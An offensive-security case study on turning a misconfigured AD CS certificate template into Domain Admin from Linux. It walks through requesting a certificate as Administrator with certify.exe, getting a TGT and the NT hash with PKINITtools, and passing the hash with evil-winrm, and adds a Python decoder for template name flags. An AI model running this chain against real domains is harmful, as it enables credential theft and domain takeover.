Case Study - Certificate Template to Domain Admin the Linux Way
Intro
A misconfigured certificate template can be used for privilege escalation. There is a good article on this topic (linked below). This case study provides an alternative approach that runs on Linux. Original study: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin
Common steps
As shown in the article above, the vulnerability can be checked with certify.exe:
> certify.exe find /vulnerable
# keep a note of this property
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
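The ENROLLEE_SUPPLIES_SUBJECT property above is a single bit in the template's msPKI-Certificate-Name-Flag attribute, which LDAP exports as a signed 32-bit integer (so values often appear negative). The following added Python, which is not from the original write-up, Certify or PKINITtools, decodes that attribute and lists the templates that carry the bit; the template records are constructed samples and the flag constants are those documented in MS-CRTD.

```python
# Added example (not from the original write-up, Certify or PKINITtools):
# decode msPKI-Certificate-Name-Flag as exported from LDAP and report the
# templates that let the enrollee supply the subject.

# Bit values from MS-CRTD section 2.26 (msPKI-Certificate-Name-Flag).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000
CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME = 0x40000000
CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH = 0x80000000

NAME_FLAGS = {
    "ENROLLEE_SUPPLIES_SUBJECT": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "SUBJECT_ALT_REQUIRE_UPN": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
    "SUBJECT_REQUIRE_COMMON_NAME": CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME,
    "SUBJECT_REQUIRE_DIRECTORY_PATH": CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH,
}


def decode_name_flags(raw):
    """Return the known flag names set in an msPKI-Certificate-Name-Flag value.

    LDAP stores the attribute as a signed 32-bit integer, so exports show
    negative numbers for the high bits; mask to 32 bits before testing.
    """
    value = int(raw) & 0xFFFFFFFF
    return sorted(name for name, bit in NAME_FLAGS.items() if value & bit)


def enrollee_supplies_subject(raw):
    """True when the template lets the requester choose subject and SAN."""
    return bool(int(raw) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)


def find_subject_supplying_templates(templates):
    """Filter {'cn': ..., 'msPKI-Certificate-Name-Flag': ...} records."""
    return [t["cn"] for t in templates
            if enrollee_supplies_subject(t["msPKI-Certificate-Name-Flag"])]


# Constructed sample export: one template whose subject is built from AD
# (directory path plus UPN in the SAN) and one custom template with the bit set.
SAMPLE_TEMPLATES = [
    {"cn": "User", "msPKI-Certificate-Name-Flag": -1509949440},   # 0xA6000000
    {"cn": "CustomWebCert", "msPKI-Certificate-Name-Flag": 1},    # 0x00000001
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(t["cn"], decode_name_flags(t["msPKI-Certificate-Name-Flag"]))
    print("enrollee supplies subject:", find_subject_supplying_templates(SAMPLE_TEMPLATES))
```

Run it against an ldapsearch or ADExplorer export of CN=Certificate Templates to get the same list that certify.exe find /vulnerable builds from this flag, before looking at the template's enrollment permissions and EKUs.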
Then, the tool can be used to request a certificate on behalf of a high-privilege user, e.g. Administrator:
> certify.exe request /ca:<CA Name> /template:<Template Name> /altname:Administrator
As explained in the article, the certificate needs to be converted to .pfx format:
> openssl pkcs12 -in cert.pem -keyex -CSP "comment" -export -out cert.pfx
The Linux way
From this point onward, we can switch to the Linux context and carry on. We will use a tool called PKINITtools.
First, we request a TGT using the .pfx certificate. This also prints the AS-REP encryption key; keep it for later use:
> python3 PKINITtools/gettgtpkinit.py -cert-pfx cert.pfx -dc-ip <dc-ip> <domain>/Administrator <ccache_file>
2023-02-27 01:16:19,092 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-02-27 01:16:19,245 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-02-27 01:16:27,755 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-02-27 01:16:27,756 minikerberos INFO <key>
INFO:minikerberos:<key>
2023-02-27 01:16:27,768 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
- Set up the ccache for authentication:
> export KRB5CCNAME=<ccache_file>
- Next, we recover the NT hash using the TGT:
# <key> is the AS-REP encryption key from the previous step
> python3 PKINITtools/getnthash.py <domain>/Administrator -k <key>
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
<hash>
- Finally, we can use the hash to log in to the target:
> evil-winrm -u Administrator -i <domain> -H <hash>